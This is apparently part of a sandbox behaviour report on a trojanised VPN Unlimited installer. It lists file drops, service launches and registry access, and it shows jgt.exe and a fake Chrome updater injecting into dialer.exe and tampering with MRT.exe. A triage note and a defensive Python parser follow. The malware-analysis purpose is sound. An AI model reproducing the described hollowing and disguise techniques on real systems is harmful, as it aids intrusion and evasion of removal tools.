| File created | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140jpn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA73A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\CatRoot2\edbres00001.jrs | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.jtx | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\CatRoot2\edbtmp.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA738.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA73A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3040 set thread context of 3948 | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 2292 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 2164 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 5020 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4676 set thread context of 1896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-47R9N.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-G32NS.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-VR72U.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-H1N09.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-A5UDN.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5Positioning.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\msvcr100.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\QtWebChannel\declarative_webchannel.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64_8\is-12DK8.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-ICBPA.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\qtquickcontrols2universalstyleplugin.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-1R099.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-F3J9D.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-16117.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5PrintSupport.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-7LIQE.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-HTQFE.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-J11RD.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-73AGP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5WebEngineWidgets.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-O8IRC.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-5LCEV.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-366G9.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-2P6VN.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-T7P6L.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-L6P8T.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\scripts\is-3BTMM.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-MMNHK.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-convert-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-process-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Window.2\is-A580Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-82VOP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-8TCF0.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-370MO.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-A43I2.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick.2\is-2FQT4.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-D59U1.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-LJP4T.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Templates.2\is-MR8IU.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-GJEGG.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-V3T3B.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-JF7NQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-EMS3K.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\QtQuick\Layouts\qquicklayoutsplugin.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-E0B57.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-libraryloader-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-AMNOT.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-73J6Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5Network.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5QmlModels.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-console-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-HQCSB.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-KM5QP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-L2SQM.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-S64FN.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-HNENE.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-U1AG4.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-runtime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\imageformats\is-G8T0L.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-381O5.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\libcrypto-3-x64.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-IA13D.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-R6BNP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e5895b3.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF7F97ED4D5EEE19E5.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB376DF80E10E6743.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5895c6.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF379FF2E62301637A.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9D75.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF088D0DB3E4C3D553.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9EED.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{D5D19E2F-7189-42FE-8103-92CD1FA457C2} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9F99.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF16603237C5F065F8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895dc.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF213DEF1E17F4658B.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895c5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF3BEE3B3B4B1C7A76.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\e5895b3.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9CD7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895c6.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFF8FA4609724A7E1B.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{0025DD72-A959-45B5-A0A3-7EFEB15A8050} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895db.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5895dc.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
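Triage note on the tables above. The System32 file writes at the top of this section, the SetThreadContext rows and the NetSh key accesses mix one real signal with a lot of installer and OS baseline: msiexec.exe dropping msvcp140/mfc140 DLLs is the Visual C++ redistributable bundled with the VPN Unlimited installer (VC_redist.x64.exe appears in the process list below), DrvInst.exe and svchost.exe writing to DriverStore and CatRoot2 is TAP driver installation, and netsh.exe opens and enumerates HKLM\SOFTWARE\Microsoft\NetSh on every start to load its registered helpers, so open/query/enumerate rows with no "Set value" or "Key created" do not show a helper DLL being registered (ATT&CK T1546.007). What does matter is a user-writable image, jgt.exe in the user's Temp directory and updater.exe under ProgramData\Google\Chrome, setting the thread context of freshly spawned dialer.exe processes (process hollowing), powershell.EXE doing the same to dllhost.exe, and jgt.exe opening C:\Windows\system32\MRT.exe (the Malicious Software Removal Tool) for modification. The Python below is an added example, not part of the sandbox report or any tool it references: it parses rows in this report's four-column format and applies those separations. The sample rows are copied from the tables above; the "trusted roots" heuristic (images under C:\Windows and C:\Program Files are OS or installed components, everything else is a candidate payload) is this example's own assumption and should be tuned for other reports.

```python
"""Triage helpers for sandbox behaviour tables in the four-column
"| Description | Indicator | Process | Target |" format used in this report.
Added example; not sandbox output and not part of any analysed sample."""
import re
from collections import Counter, defaultdict

# Sample input: rows copied from the report tables above.
SAMPLE_ROWS = r"""
| File opened for modification | C:\Windows\system32\mfc140jpn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| PID 3040 set thread context of 3948 | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 2292 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 2164 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4676 set thread context of 1896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
"""

ROW_RE = re.compile(r"^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|$")
CTX_RE = re.compile(r"PID (\d+) set thread context of (\d+)")
# Assumption of this example: images under these roots are OS or installed-software
# components; a payload dropped to Temp, AppData or ProgramData will not be.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_rows(text):
    """Turn table rows into dicts; the header row and non-table lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m and m.group(1) != "Description":
            rows.append(dict(zip(("description", "indicator", "process", "target"), m.groups())))
    return rows


def is_trusted_image(path):
    return path.lower().startswith(TRUSTED_ROOTS)


def payload_actors(rows):
    """Distinct process images living outside C:\\Windows and C:\\Program Files."""
    return sorted({r["process"] for r in rows
                   if r["process"] != "N/A" and not is_trusted_image(r["process"])})


def injection_chain(rows):
    """source image -> [(source PID, target PID, target image)] from SetThreadContext rows."""
    chain = defaultdict(list)
    for r in rows:
        m = CTX_RE.search(r["description"])
        if m:
            chain[r["process"]].append((int(m.group(1)), int(m.group(2)), r["target"]))
    return dict(chain)


def suspicious_system_writes(rows):
    """File writes under System32/SysWOW64 by an untrusted image. msiexec.exe laying
    down msvcp140/mfc140 DLLs is the VC++ redistributable; jgt.exe touching MRT.exe is not."""
    return [(r["process"], r["indicator"]) for r in rows
            if r["description"].startswith("File")
            and r["indicator"].lower().startswith(SYSTEM_DIRS)
            and not is_trusted_image(r["process"])]


def netsh_helper_writes(rows):
    """NetSh-key rows that modify the key. netsh.exe opens and enumerates
    HKLM\\SOFTWARE\\Microsoft\\NetSh on every start to load registered helpers, so
    open/query/enumerate rows are baseline; only a value set or a key created
    would show a helper DLL being registered (ATT&CK T1546.007)."""
    return [r for r in rows
            if "\\microsoft\\netsh" in r["indicator"].lower()
            and r["description"].startswith(("Set value", "Key created"))]


def by_process(rows):
    """Rows per image: shows which signatures are driven by the payload and which
    by msiexec.exe/DrvInst.exe/svchost.exe doing installer and driver work."""
    return Counter(r["process"] for r in rows)


def triage(text):
    rows = parse_rows(text)
    return {
        "payload_actors": payload_actors(rows),
        "injection_chain": injection_chain(rows),
        "system_writes": suspicious_system_writes(rows),
        "netsh_helper_writes": netsh_helper_writes(rows),
        "rows_by_process": by_process(rows),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

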